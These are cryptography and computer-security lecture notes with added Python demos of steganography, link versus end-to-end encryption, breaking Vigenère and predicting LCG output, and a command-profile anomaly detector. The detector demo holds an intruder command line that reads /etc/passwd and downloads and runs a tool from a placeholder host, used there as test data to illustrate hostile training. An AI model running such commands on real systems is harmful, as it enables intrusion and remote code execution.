Cryptography: secret (crypto) writing (graphy). It is concerned with developing algorithms which may be used to:

• conceal the content of some message from all except the sender and recipient (privacy or secrecy), and/or
• verify the correctness of a message to the recipient (authentication).

These techniques form the basis of many technological solutions to computer and communications security problems.

CIPHERS IN HISTORY

Cryptology could be considered one of humanity's oldest professions. Ciphers have a history of at least 4000 years.

• Ancient Egyptians enciphered some of their hieroglyphic writing on monuments.
• The clay disc of Phaistos (Cretan-Minoan, 17th century BC) is still undeciphered.
• Herodotus describes how concealed messages were carried by messengers.
• Ancient Hebrews enciphered certain words in the scriptures.
• 2000 years ago Julius Caesar used a simple substitution cipher, now known as the Caesar cipher.
• Roger Bacon described several methods in the 1200s.
• Geoffrey Chaucer included several ciphers in his works.
• Leon Alberti devised a cipher wheel, and described the principles of frequency analysis, in the 1460s.
• Blaise de Vigenère published a book on cryptology in 1585 which described the polyalphabetic substitution cipher.
• Increasing use, especially in diplomacy and war, over the centuries.
• One-time pads: widely used in diplomacy.

David Kahn, in his beautiful book "The Codebreakers", has numerous such examples.

STEGANOGRAPHY

Methods of concealing text:

Character marking: Selected letters of the text are overwritten in pencil. The marks are not visible unless the paper is held at an angle to bright light.

Invisible ink: Substances can be used that leave no visible trace until heat or some chemical is applied.

Pin punctures: Small pin punctures on selected letters are not ordinarily visible unless the paper is held in front of a light.

Typewriter correction ribbon: Used between lines typed with a black ribbon; the results of the typing are visible only under a strong light.

These techniques have modern analogues (e.g., pixel transformations). Unfortunately, steganography in general requires a lot of overhead: the cover medium must be much larger than the message it hides.
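The "pixel transformation" analogue mentioned above, as an added example that is not part of the original notes: least-significant-bit (LSB) embedding in a grayscale image. The cover image here is a constructed 16x16 array of pixel values rather than a file loaded from disk, and the length-prefix layout is an assumption of this example. It shows two things the text only states: the change to the cover is invisible in the numeric sense (no pixel moves by more than 1), and the overhead is real (eight cover bytes per hidden byte, plus a length prefix).

```python
"""LSB steganography over a constructed grayscale image (added example)."""

# Constructed sample: a 16x16 8-bit grayscale "image" as a flat list of pixel
# values. A real image would come from an image library; this one is synthetic.
WIDTH, HEIGHT = 16, 16
COVER = [((x * 7 + y * 13) % 256) for y in range(HEIGHT) for x in range(WIDTH)]


def _bits(data):
    """Yield the bits of `data`, most significant bit first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover, message):
    """Hide `message` in the least significant bit of successive pixels.

    Layout (an assumption of this example): a 16-bit big-endian length prefix
    followed by the message bytes, one bit per pixel. Capacity is therefore
    len(cover) // 8 - 2 bytes.
    """
    capacity = len(cover) // 8 - 2
    if len(message) > capacity:
        raise ValueError(f"message too long: {len(message)} > {capacity} bytes")
    payload = len(message).to_bytes(2, "big") + message
    stego = list(cover)
    for i, bit in enumerate(_bits(payload)):
        stego[i] = (stego[i] & 0xFE) | bit      # overwrite the LSB only
    return stego


def extract(stego):
    """Recover the hidden message from the LSBs (inverse of embed)."""
    def read_bytes(start_bit, count):
        out = bytearray()
        for b in range(count):
            value = 0
            for k in range(8):
                value = (value << 1) | (stego[start_bit + b * 8 + k] & 1)
            out.append(value)
        return bytes(out)
    length = int.from_bytes(read_bytes(0, 2), "big")
    return read_bytes(16, length)


def max_pixel_change(cover, stego):
    """Largest per-pixel difference between cover and stego image (LSB: at most 1)."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def overhead_ratio(cover, message):
    """Cover bytes consumed per message byte: the 'overhead' of the scheme."""
    return len(cover) / len(message)


if __name__ == "__main__":
    secret = b"meet at dawn"
    stego = embed(COVER, secret)
    print(extract(stego), max_pixel_change(COVER, stego), overhead_ratio(COVER, secret))
```

The 256-pixel cover carries at most 30 message bytes; anything longer is rejected rather than silently truncated, which is the failure mode a careless implementation would have.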
See http://cacr.math.uwaterloo.ca/~dstinson/visual.html for an interesting image.

Steganography has become a modern subject with applications to security. Some important topics include:

1. Mimicry (reading between the lines, compression and decompression techniques, encoding and decoding algorithms)
2. Anonymous remailers
3. Secret broadcasting (the Dining Cryptographers problem)

MACHINE CIPHERS

Jefferson cylinder: developed in the 1790s; comprised 36 disks, each with a random alphabet. The order of the disks was the key; the message was set along one row, and another row was read off as the ciphertext.

Wheatstone disc: invented by Wadsworth in 1817, but developed by Wheatstone in the 1860s; comprised two concentric wheels used to generate a polyalphabetic cipher.

Hagelin machine: a truly pioneering machine.

Enigma rotor machine: one of a very important class of cipher machines, heavily used during the Second World War; comprised a series of rotor wheels with internal cross-connections, providing a substitution using a continuously changing alphabet.

See my web page for pictures.

BASIC CONCEPTS

cryptography: the art or science encompassing the principles and methods of transforming an intelligible message into one that is unintelligible, and then retransforming that message back to its original form.

plaintext: the original intelligible message.

ciphertext: the transformed message.

cipher: an algorithm for transforming an intelligible message into one that is unintelligible, by transposition and/or substitution methods.

key: some critical information used by the cipher, known only to the sender and receiver.

encipher (encode): the process of converting plaintext to ciphertext using a cipher and a key.

decipher (decode): the process of converting ciphertext back into plaintext using a cipher and a key.

cryptanalysis: the study of the principles and methods of transforming an unintelligible message back into an intelligible message without knowledge of the key.
Also called codebreaking.

cryptology: both cryptography and cryptanalysis.

code: an algorithm for transforming an intelligible message into an unintelligible one using a code-book.

COMMUNICATION SECURITY

As information highways expand, cryptographic techniques will play an important role in satisfying users' privacy requirements. Important aspects of security include:

• Authentication
• Communication Security
• Data Distribution
• Digital Cash
• Electronic Mail
• Electronic Voting

REQUIREMENTS

In communication security it is the security of real-time electronic links, local and wide area networks, link encryption, cellular and ordinary telephony, and faxes.

In data distribution it is conditional access (e.g., TV), software distribution, and information bulletin boards.

In digital cash it is the creation of an electronic system that replaces paper money and is more flexible than credit cards.

In electronic voting it is secure distributed computation, e.g., elections at shareholders' meetings.

GOALS

In communication security they include message privacy, sender and recipient authentication, and non-repudiation.

In data distribution they include broadcast and multicast operations, message privacy, and selective reception.

In digital cash they include anonymity, untraceability, transferability, fairness, off-line operation, and universality.

In electronic voting they include anonymity, fairness, and accountability.

Tools include: key-agreement protocols, private-key cryptosystems, public-key cryptosystems, digital signatures, certificates, secure hardware, untraceability protocols, ..., and beautiful mathematics.

Research in cryptography is a diverse and mathematically sophisticated practice. Topics include:

• Design and Analysis of Cryptographic Algorithms
• Design and Analysis of Cryptographic Protocols
• Hardware and Software Implementations
• Applications of Cryptography

CAUSES OF SYSTEM VULNERABILITY

In typical applications workstations are attached to LANs. The user can reach other hosts, workstations, and servers in the same LAN, which are interconnected via bridges and routers.
Transmissions from station to station are visible on the LAN to all stations. Data is transmitted in the form of packets which contain source/destination IDs and other information. On this basis, an eavesdropper can monitor and capture traffic packets. The eavesdropper need not be a local LAN user; it could be anyone to whom the LAN offers a dial-up capability.

Eavesdropping may also occur on any of the communications links which provide connectivity to the system, e.g., by tapping the wires used for transmission, or by attaching a low-power radio transmitter and picking up the resulting signals. This problem becomes worse in WANs.

TWO BASIC APPROACHES TO SECURITY

Link Encryption: Each vulnerable communication link is equipped on both ends with an encryption device. The main disadvantage is that it is effective only if all potentially weak links from source to destination are secured; and since every intermediate node must decrypt the frame to read the header, the data is in the clear inside each node along the path.

End-to-End Encryption: Data is encrypted only at the source node and decrypted at the destination node.

Problem: Data consists of packets. Packets have a header portion and a content portion. You cannot encrypt the header (because it would then be impossible to route the data). It follows that although the user data is secure, the traffic pattern is not!

Solution: Use a combination of link and end-to-end encryption.

PLACEMENT OF SECURITY FUNCTION

In the communication hierarchy, link security is at a low level, while end-to-end security is at a high level. Link encryption occurs at the physical or link layers of the protocol stack. End-to-end encryption occurs at a front-end processing unit, and the header bypasses encryption in the intermediate stages.

[Figure: random bits feed the encryption key; plaintext is transformed into ciphertext.]

TRAFFIC SECURITY

It is usually necessary to conceal:

• the identities of the partners,
• how frequently two users communicate,
• message patterns, e.g., length, quantity, time, etc.,
• events that correlate with special communications.

Link encryption conceals headers, thus reducing the probability of effective traffic analysis. End-to-end encryption leaves the headers exposed, and so limits the possible defences against traffic analysis.
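The two approaches and their combination, as an added example (not from the original notes) on a toy path A -> R1 -> R2 -> B. The link keys, the end-to-end key, the header format and the XOR-with-SHA-256 stream cipher are all assumptions made for illustration; the cipher is not something to deploy. What the simulation makes concrete is who sees what: with link encryption alone the routers see the payload, with end-to-end encryption alone the wire shows the header, and only the combination hides both from the wire while still giving routers the header they need to forward.

```python
"""Link vs. end-to-end encryption on a toy path A -> R1 -> R2 -> B (added example)."""
import hashlib

NODES = ["A", "R1", "R2", "B"]
# Constructed demo keys for a toy cipher; not real key material.
LINK_KEYS = {("A", "R1"): b"link-key-A-R1",
             ("R1", "R2"): b"link-key-R1-R2",
             ("R2", "B"): b"link-key-R2-B"}
E2E_KEY = b"end-to-end-key-A-B"
HEADER = b"A>B"          # routing header: source > destination (assumed format)
SEP = b"|"


def xor_stream(key, nonce, data):
    """Toy stream cipher: XOR data with SHA-256(key || nonce || counter) blocks.
    XOR is self-inverse, so the same call both encrypts and decrypts.
    Illustration only: a real system needs an authenticated cipher."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def transmit(mode, payload, nonce=b"pkt-0001"):
    """Carry one packet from A to B under a protection mode: 'none', 'link'
    (each hop encrypts the whole frame), 'e2e' (only A and B encrypt, header
    in clear) or 'both'. Returns what an eavesdropper sees on each wire
    segment, what each router sees after its own link decryption, and what B
    finally reads."""
    use_link = mode in ("link", "both")
    use_e2e = mode in ("e2e", "both")
    body = xor_stream(E2E_KEY, nonce, payload) if use_e2e else payload
    packet = HEADER + SEP + body
    on_wire, at_routers = [], []
    for src, dst in zip(NODES, NODES[1:]):
        link_key = LINK_KEYS[(src, dst)]
        frame = xor_stream(link_key, nonce, packet) if use_link else packet
        on_wire.append(frame)
        # The receiving node strips link encryption: a router must read the
        # header in clear to decide where to forward the packet.
        packet = xor_stream(link_key, nonce, frame) if use_link else frame
        if dst != "B":
            at_routers.append(packet)
    _header, body = packet.split(SEP, 1)
    delivered = xor_stream(E2E_KEY, nonce, body) if use_e2e else body
    return {"wire": on_wire, "routers": at_routers, "delivered": delivered}


def exposure(mode, payload):
    """Which secrets are visible where under the given mode."""
    obs = transmit(mode, payload)
    return {
        "header_on_wire": any(HEADER in f for f in obs["wire"]),
        "payload_on_wire": any(payload in f for f in obs["wire"]),
        "payload_at_routers": any(payload in r for r in obs["routers"]),
        "header_at_routers": any(HEADER in r for r in obs["routers"]),
        "delivered_ok": obs["delivered"] == payload,
    }


if __name__ == "__main__":
    for mode in ("none", "link", "e2e", "both"):
        print(mode, exposure(mode, b"transfer 10 million to account 4711"))
```

Note that "header_at_routers" is true in every mode, including "both": routing needs it, which is exactly why the traffic pattern can never be fully hidden from the nodes that forward the packet, only from the wire between them.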
DISTRIBUTING KEYS

In conventional encryption a key must be shared by the two communicating users. Therefore any conventional cryptographic system is only as good as the method employed for distributing keys.

• A key can be delivered by one user to the other either directly (e.g., physically) or indirectly (e.g., physically by an intermediary).
• A new key can be delivered by encrypting it with an older key, using either a direct secure connection or an indirect secure connection via an intermediary.

The first option is awkward. Some form of the second option is widely accepted.

KEY CONTROL

Hierarchical: A hierarchy of Key Control Centers is established. Each center is responsible locally for a small system. Control is passed to a higher level for external communication.

Key Lifetime: The same key is used only for a limited lifetime.

Decentralized Key Control: Full decentralization is not practical. However, some form of decentralization limits abuses by a central authority.

Key Usage: It is useful to classify keys on the basis of their type of usage, e.g., data encryption keys (for general communication), PIN keys (for Personal Identification Numbers), file keys (for encrypting files). This limits the potential damage caused by a compromise to one type of use.

PSEUDO RANDOM GENERATION

Random numbers find numerous uses in cryptography, especially in authentication schemes and session key generation, in conventional as well as public-key cryptography. Perfect random generation is impossible with a deterministic device like a computer. Usually we have to generate pseudorandom numbers from a deterministic source. The resulting numbers must be unpredictable, independent, and uniformly distributed.

Linear Congruential Generator: $x_{n+1} = (a x_n + b) \bmod m$.

Blum-Blum-Shub Generator: $p \equiv q \equiv 3 \pmod 4$ are distinct primes; $x_{n+1} = x_n^2 \bmod pq$.

VIOLATIONS OF SECURITY

As business and government depend more on computers and networks, so grows the threat of computer crime. In 1994, V. L. Levin, a Russian computer hacker from St. Petersburg, managed to infiltrate Citibank and transfer 10 million US dollars over five months to bank accounts in California, Finland, and Germany.

20 years ago computer systems were relatively unavailable. Now the taxonomy of users includes members of crime syndicates, industrial espionage teams, information thieves, etc. Only 5% of victim sites are even aware that they have been infiltrated.

DETECTING ANOMALOUS PATTERNS

Detecting anomalies can be used for "enhancing" security. Citibank will not reveal how Levin was caught. However, more is known about IBM's Fraud and Abuse Management System (FAMS). FAMS separates normal billing patterns from unusual ones by profiling providers against one another and checking for unusual patterns that pointed to fraud in the past.

Blue Cross/Blue Shield caught a doctor who billed them 1.4 million dollars for bronchoscopies that were never performed. The program noticed that the doctor claimed to perform one such operation per patient per week (normally this is performed once or twice in a patient's lifetime).

A typical computer user executes a standard pattern of commands. For example, here is a sequence of commands I normally execute in my UNIX account:

cd work; ls -laF; cd publications; ls *.tex; vi myfile.tex; latex myfile.tex; dvips myfile; lpr -Pfaculty myfile.ps;

This sequence of commands could be recorded as part of a user's profile. Once the profile is created, an anomaly detector continuously compares the user's current activity to the known profile to obtain a "similarity" score.

ADAPTING OVER TIME

A system can even be taught to adapt over time. It learns the "usage" patterns of a user and adapts. In turn, a malicious intruder can try to "fool" the system by teaching it to "accept" an increasingly aggressive "new" usage pattern. This is of course hypothetical, but hostile training is a danger.

Detecting anomalies can also be used for "breaking" security. In 1996, P. Kocher demonstrated how to determine a private key by keeping track of how long the computer takes to decipher messages.

SECURITY IN PRACTICE: 3 METHODS

1. FIREWALLS: Only certain computers are accessible to the general public (outside the company), forming a special "demilitarized zone" or DMZ. Potentially dangerous data (e.g., internet, e-mail, etc.) are filtered by a proxy server. These are then transferred to proxy programs that can run safely, and subsequently delivered to company employees.

A large company or organization may require more than one firewall. As the company grows, additional firewalls may need to be installed.

Firewalls also involve packet filtering, thus possibly rejecting packets coming from certain internet addresses. Intruders may of course try to forge trusted source addresses, hence authentication principles play an important role.

2. DIGITAL CERTIFICATES: To send and receive messages users must have a private as well as a public key (strings of length about 1,000 bits). Digital signatures are created from the message and the private key and accompany the message. The signature is verified using the public key. A trusted authority is used to create a digital certificate that certifies that a certain public key belongs to a certain person.

3. JAVA SANDBOX: Unscrupulous developers could create applets that would interfere with a user's computer system. Java has a layer of software (called the Java Virtual Machine) which executes any applet written in the language. The virtual machine prevents the program from getting access to the computer's hard drive. It is like the applet sitting in a child's sandbox (where it can do no damage). It gets out only when the virtual machine verifies that the applet can be trusted.

DEFINITION OF CRYPTOSYSTEM

A cryptosystem consists of the following finite sets:

P: plaintext space
C: ciphertext space
K: keyspace

Encryption function E: for each $k \in K$, $E_k : P \to C$.

Decryption function D: for each $k \in K$, $D_k : C \to P$.

Main property: the functions $E_k$ and $D_k$ are inverses of each other, i.e., for all $p \in P$ and $k \in K$, $D_k(E_k(p)) = p$.

IMPORTANT PROPERTIES

• The encryption and decryption functions are efficiently computable for all keys $k$, i.e., it should be relatively easy both to encrypt and to decrypt, given the key; and
• it should be computationally infeasible to decipher the ciphertext, i.e., an opponent, upon seeing a ciphertext, should be unable to determine either the key $k$ that was used or the original plaintext string.
• Usually we assume the cryptographic system is public, and only the key is secret information (Kerckhoffs's principle).
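A concrete instance of the definition above, as an added example that is not part of the original notes: the Vigenère cipher from the CIPHERS IN HISTORY section written as a cryptosystem with $P = C$ = strings over A-Z, $K$ = keywords, $E_k$ a periodic shift and $D_k$ its inverse (a one-letter key is the Caesar cipher). The block then runs Alberti's frequency analysis against it: the index of coincidence recovers the key length and a chi-squared fit to English letter frequencies recovers each shift. So the first property (efficient $E_k$, $D_k$) holds and the second (infeasible to recover $k$ from ciphertext alone) fails. The sample plaintext is the BASIC CONCEPTS definitions from this document; the English frequency table is the standard one, and the key "LEMON" is an arbitrary choice.

```python
"""A Vigenere cryptosystem (P, C, K, E_k, D_k) over Z_26 strings, with the
frequency-analysis attack that shows why it is not computationally secure
(added example)."""
from collections import Counter

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# Relative letter frequencies of English text, in percent, for A..Z.
ENGLISH_FREQ = [8.167, 1.492, 2.782, 4.253, 12.702, 2.228, 2.015, 6.094, 6.966,
                0.153, 0.772, 4.025, 2.406, 6.749, 7.507, 1.929, 0.095, 5.987,
                6.327, 9.056, 2.758, 0.978, 2.360, 0.150, 1.974, 0.074]


def letters_only(text):
    """Map arbitrary text into the plaintext space P (uppercase A-Z strings)."""
    return "".join(ch for ch in text.upper() if ch in ALPHABET)


def encrypt(key, plaintext):
    """E_k: shift letter i by key[i mod len(key)]. A one-letter key is the Caesar cipher."""
    shifts = [ALPHABET.index(c) for c in key]
    return "".join(ALPHABET[(ALPHABET.index(c) + shifts[i % len(shifts)]) % 26]
                   for i, c in enumerate(plaintext))


def decrypt(key, ciphertext):
    """D_k: the inverse shift, so decrypt(k, encrypt(k, p)) == p for all p, k."""
    shifts = [ALPHABET.index(c) for c in key]
    return "".join(ALPHABET[(ALPHABET.index(c) - shifts[i % len(shifts)]) % 26]
                   for i, c in enumerate(ciphertext))


def index_of_coincidence(s):
    """Probability that two random letters of s coincide (~0.066 English, ~0.038 uniform)."""
    n = len(s)
    counts = Counter(s)
    return sum(c * (c - 1) for c in counts.values()) / (n * (n - 1)) if n > 1 else 0.0


def guess_key_length(ciphertext, max_len=8):
    """Pick the period whose columns look most like single-shift English text."""
    best_len, best_ioc = 1, -1.0
    for length in range(1, max_len + 1):
        avg = sum(index_of_coincidence(ciphertext[i::length]) for i in range(length)) / length
        if avg > best_ioc:
            best_len, best_ioc = length, avg
    return best_len


def chi_squared(text):
    """Distance between the letter counts of text and English expectations."""
    n = len(text)
    counts = Counter(text)
    return sum((counts.get(ch, 0) - n * f / 100) ** 2 / (n * f / 100)
               for ch, f in zip(ALPHABET, ENGLISH_FREQ))


def recover_key(ciphertext, key_len):
    """Each column is a Caesar cipher: choose the shift that best fits English."""
    key = ""
    for i in range(key_len):
        column = ciphertext[i::key_len]
        best = min(range(26), key=lambda s: chi_squared(decrypt(ALPHABET[s], column)))
        key += ALPHABET[best]
    return key


def break_vigenere(ciphertext):
    """Ciphertext-only attack: returns (recovered key, recovered plaintext)."""
    key = recover_key(ciphertext, guess_key_length(ciphertext))
    return key, decrypt(key, ciphertext)


# Sample plaintext: the BASIC CONCEPTS definitions from these notes, long
# enough for the letter statistics to be reliable.
SAMPLE = letters_only(
    "cryptography is the art or science encompassing the principles and methods of "
    "transforming an intelligible message into one that is unintelligible and then "
    "retransforming that message back to its original form. plaintext is the original "
    "intelligible message. ciphertext is the transformed message. a cipher is an algorithm "
    "for transforming an intelligible message into one that is unintelligible by "
    "transposition and or substitution methods. the key is some critical information used "
    "by the cipher known only to the sender and receiver. to encipher is to convert "
    "plaintext to ciphertext using a cipher and a key. to decipher is to convert ciphertext "
    "back into plaintext using a cipher and a key. cryptanalysis is the study of principles "
    "and methods of transforming an unintelligible message back into an intelligible "
    "message without knowledge of the key.")

if __name__ == "__main__":
    c = encrypt("LEMON", SAMPLE)
    print(break_vigenere(c)[0], decrypt("LEMON", c) == SAMPLE)
```

The attack needs nothing but the ciphertext and public knowledge of the system, which is exactly the Kerckhoffs setting the last property assumes; a one-time pad with a key as long as the message is the limiting case where the column statistics carry no information.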
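Returning to the PSEUDO RANDOM GENERATION section above, an added example (not from the original notes) of why "unpredictable" is the requirement that the linear congruential generator misses: three consecutive outputs and the public modulus $m$ are enough to recover $a$ and $b$ and predict every later value, since $x_2 - x_1 \equiv a(x_1 - x_0) \pmod m$. The Blum-Blum-Shub generator is implemented alongside with its stated conditions ($p \equiv q \equiv 3 \pmod 4$, seed coprime to $pq$) so the two recurrences can be compared; the parameter values are arbitrary choices for the demonstration.

```python
"""Linear congruential generator, its prediction attack, and Blum-Blum-Shub
(added example)."""
import math


def lcg(seed, a, b, m, count):
    """x_{n+1} = (a * x_n + b) mod m; returns the first `count` outputs."""
    xs, x = [], seed
    for _ in range(count):
        x = (a * x + b) % m
        xs.append(x)
    return xs


def recover_lcg(outputs, m):
    """Recover (a, b) from three consecutive LCG outputs when m is known.

    From x1 = a*x0 + b and x2 = a*x1 + b (mod m):
        x2 - x1 = a * (x1 - x0)  =>  a = (x2 - x1) * (x1 - x0)^-1 mod m.
    Requires x1 - x0 to be invertible mod m (always true for prime m, x1 != x0).
    """
    x0, x1, x2 = outputs[:3]
    d = (x1 - x0) % m
    if math.gcd(d, m) != 1:
        raise ValueError("x1 - x0 is not invertible modulo m")
    a = ((x2 - x1) * pow(d, -1, m)) % m
    b = (x1 - a * x0) % m
    return a, b


def predict_next(outputs, m):
    """Predict the output following the given consecutive outputs."""
    a, b = recover_lcg(outputs[-3:], m)
    return (a * outputs[-1] + b) % m


def bbs_bits(seed, p, q, count):
    """Blum-Blum-Shub: p ≡ q ≡ 3 (mod 4) distinct primes, seed coprime to pq.
    Emits the least significant bit of each x_{n+1} = x_n^2 mod pq."""
    if p % 4 != 3 or q % 4 != 3 or p == q:
        raise ValueError("p and q must be distinct primes congruent to 3 mod 4")
    m = p * q
    if math.gcd(seed, m) != 1:
        raise ValueError("seed must be coprime to pq")
    bits, x = [], seed
    for _ in range(count):
        x = x * x % m
        bits.append(x & 1)
    return bits


if __name__ == "__main__":
    M = 2 ** 31 - 1                       # a Mersenne prime, a common LCG modulus
    stream = lcg(42, 16807, 12345, M, 6)  # parameters chosen for the demo
    print(recover_lcg(stream[:3], M), predict_next(stream[:3], M) == stream[3])
    print(bbs_bits(3, 11, 19, 6))         # toy primes, far too small for real use
```

The LCG attack is exact, not statistical: any observer of three session values can compute the fourth. For BBS the analogous attack is believed to require factoring $pq$, which is why the primes must be large in practice, unlike the toy values used here.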
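The profile and "similarity score" of the DETECTING ANOMALOUS PATTERNS section, and the hostile training of ADAPTING OVER TIME, as one added example that is not part of the original notes. The baseline is the command sequence quoted in the notes; the other sessions, the bigram-overlap score, the acceptance threshold and the placeholder tool URL are all constructed for this demonstration. Scoring by overlap of adjacent-command pairs is one simple choice of similarity measure, not the notes' or FAMS's method. The last part shows the danger the notes call hypothetical: an intruder session that scores 0 against the original profile passes once the adaptive detector has absorbed three slightly drifted sessions.

```python
"""Command-sequence profiling with a similarity score, plus a hostile-training
demonstration (added example)."""
from collections import Counter

# Baseline session: the command sequence given in the notes.
PROFILE_SESSION = ("cd work; ls -laF; cd publications; ls *.tex; vi myfile.tex; "
                   "latex myfile.tex; dvips myfile; lpr -Pfaculty myfile.ps")

# Constructed sessions for the demo; the tool URL is a placeholder.
NORMAL_SESSION = ("cd work; ls -laF; cd publications; vi myfile.tex; "
                  "latex myfile.tex; dvips myfile; lpr -Pfaculty myfile.ps")
INTRUDER_SESSION = "cat /etc/passwd; wget http://example.invalid/tool; chmod +x tool; ./tool"
DRIFT_SESSIONS = [  # each step mixes a little more hostile activity into normal work
    "cd work; ls -laF; cat /etc/passwd; cd publications; ls *.tex; vi myfile.tex",
    "cd work; ls -laF; cat /etc/passwd; wget http://example.invalid/tool; "
    "cd publications; ls *.tex",
    "cd work; ls -laF; cat /etc/passwd; wget http://example.invalid/tool; chmod +x tool; "
    "cd publications; ls *.tex",
]


def commands(session):
    """Reduce a ';'-separated shell session to its command names."""
    return [part.split()[0] for part in session.split(";") if part.strip()]


def bigrams(cmds):
    """Count adjacent command pairs: the order of commands is what we profile."""
    return Counter(zip(cmds, cmds[1:]))


def build_profile(session):
    return bigrams(commands(session))


def similarity(profile, session):
    """Fraction of the session's command bigrams already present in the profile (0..1)."""
    observed = bigrams(commands(session))
    total = sum(observed.values())
    if total == 0:
        return 0.0
    return sum(n for bg, n in observed.items() if bg in profile) / total


def train(profile, sessions, threshold):
    """Adaptive detector: absorb every session that scores >= threshold.
    Returns the updated profile and the score history (the input profile is not modified)."""
    history = []
    for session in sessions:
        score = similarity(profile, session)
        history.append(round(score, 3))
        if score >= threshold:
            profile = profile + bigrams(commands(session))
    return profile, history


if __name__ == "__main__":
    baseline = build_profile(PROFILE_SESSION)
    print("normal:", similarity(baseline, NORMAL_SESSION))
    print("intruder vs baseline:", similarity(baseline, INTRUDER_SESSION))
    drifted, history = train(baseline, DRIFT_SESSIONS, threshold=0.6)
    print("drift scores:", history)
    print("intruder vs drifted:", similarity(drifted, INTRUDER_SESSION))
```

The defence implied by this result is not to let the detector update its profile from sessions it merely failed to flag; updates need an independent confirmation (or a slower, reviewed retraining), otherwise the threshold becomes the attacker's pacing guide.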